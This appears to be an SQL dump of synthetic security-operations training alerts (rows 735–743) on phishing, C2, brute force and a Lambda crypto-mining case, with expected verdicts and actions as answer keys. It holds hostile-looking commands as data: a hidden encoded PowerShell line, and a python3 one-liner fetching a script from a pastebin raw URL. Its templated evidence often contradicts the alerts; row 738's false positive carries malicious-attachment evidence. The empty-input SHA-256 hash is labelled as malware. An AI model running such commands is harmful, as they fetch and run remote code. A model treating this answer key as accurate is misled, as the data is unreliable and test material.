(735, 'Spear Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A spear phishing email was detected targeting an employee, containing a malicious URL hosted on a lookalike domain. The email uses urgency language to lure the victim into clicking the link.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.10.5\",\"username\":\"jdoe@example.com\",\"hostname\":\"WS-001\",\"email_sender\":\"ceo@examp1e.com\",\"url\":\"http://login.examp1e.com/secure\",\"email_subject\":\"Urgent: Verify Your Account Immediately\"}', '2026-01-11 02:32:22', '2026-03-15 10:53:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@examp1e.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.examp1e.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing login pages\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The lookalike domain and use of urgency suggest a targeted phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.381Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(736, 'Detected Command and Control Communication from Malware', 'critical', 'CrowdStrike', 'A malware infection was detected attempting to communicate with a known C2 server. The connection was initiated from an internal host.', 'Malware', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.89\",\"username\":\"user1@company.com\",\"hostname\":\"PC-003\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\"}', '2026-01-10 14:58:13', '2026-02-16 18:03:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in several malware infections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication to a known C2 server confirms the host is compromised.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(737, 'Failed Brute Force Login Attempts Detected', 'medium', 'Wazuh', 'Multiple failed login attempts were detected from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe@company.com\",\"hostname\":\"PC-004\",\"failed_attempts\":35}', '2026-01-11 11:45:57', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported several times for suspicious login activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No additional suspicious activity detected for this user\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and foreign IP location indicate a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.382Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe@company.com\\\",\\\"hostname\\\":\\\"PC-004\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(738, 'Suspicious Email Flagged as Possible False Positive', 'low', 'Email Gateway', 'An email was flagged as suspicious due to its sender domain, but analysis shows it matches known safe entities.', 'Phishing', 'T1598', 0, 'Closed', 232, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user2@company.com\",\"hostname\":\"WS-002\",\"email_sender\":\"newsletter@trustedsource.com\",\"email_subject\":\"Monthly Updates\"}', '2026-01-11 10:40:23', '2026-03-09 18:19:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"newsletter@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Sender domain verified as legitimate source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP matches known safe email servers\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and IP are verified as legitimate, indicating this is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Flagged as Possible False Positive\",\"date\":\"2026-02-01T20:32:22.384Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(739, 'APT-Level Phishing Attack via Spoofed Office365 Login Page', 'critical', 'Proofpoint', 'A spear phishing email was detected attempting to harvest credentials using a spoofed Office365 login page. The email was sent from a lookalike domain and contained urgency language.', 'Phishing', 'T1566', 1, 'investigating', 34, '{\"timestamp\":\"2026-01-11T09:15:34Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"jdoe@company.com\",\"hostname\":\"mail.company.com\",\"email_sender\":\"no-reply@0ffice365-security.com\",\"domain\":\"0ffice365-security.com\",\"url\":\"http://login-verifyoffice365.com\",\"email_subject\":\"Immediate Action Required: Verify Your Office365 Account\"}', '2026-01-11 14:23:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 157 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@0ffice365-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lookalike domain used in phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-verifyoffice365.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing page mimicking Office365 login\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and used a lookalike domain to deceive users into entering their credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT-Level Phishing Attack via Spoofed Office365 Login Page\",\"date\":\"2026-02-01T20:32:22.385Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(740, 'Fileless Malware Detected via Process Hollowing', 'high', 'CrowdStrike', 'A process hollowing technique was detected on a user endpoint, indicating a potential fileless malware execution. The attack leveraged PowerShell with heavy obfuscation.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"\",\"username\":\"m.smith\",\"hostname\":\"DESKTOP-45KTHR\",\"command_line\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\"}', '2026-01-11 01:56:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of process hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests process hollowing, a common technique for fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(741, 'DGA Domain Detected in Network Traffic', 'medium', 'Firewall', 'Suspicious network traffic was detected involving a domain generated by a Domain Generation Algorithm (DGA), commonly used for C2 communication.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jane.doe\",\"hostname\":\"LAPTOP-JDOE\",\"domain\":\"gibberish12345.biz\"}', '2026-01-09 20:43:04', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA domains\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gibberish12345.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain matches patterns used by DGA malware\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The domain and associated IP are indicative of DGA-based C2 communication.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(742, 'Failed Network Connection Attempt to Known Malicious IP', 'low', 'IDS', 'A network connection attempt was detected to an external IP previously reported for malicious activities. Further investigation revealed it was a benign service misconfiguration.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:47:59Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.99\",\"username\":\"svc.account\",\"hostname\":\"SERV-01\"}', '2026-01-10 08:16:16', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the service account host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for malicious activities but currently clean\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection attempt to a previously malicious IP was due to a misconfigured service, resulting in a false positive.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(743, 'Suspicious AWS Lambda Invocation Detected', 'critical', 'AWS GuardDuty', 'A Lambda function was invoked with a payload indicative of crypto mining. The function leveraged multiple legitimate services as C2 channels.', 'Malware', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:23:45Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.56\",\"username\":\"aws_lambda_user\",\"hostname\":\"lambda-instance-01\",\"command_line\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-01-11 09:40:26', '2026-02-16 18:02:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 237 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known crypto mining malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command uses pastebin to fetch remote scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Lambda invocation detected with indicators pointing to crypto mining. IP and hash linked to malicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
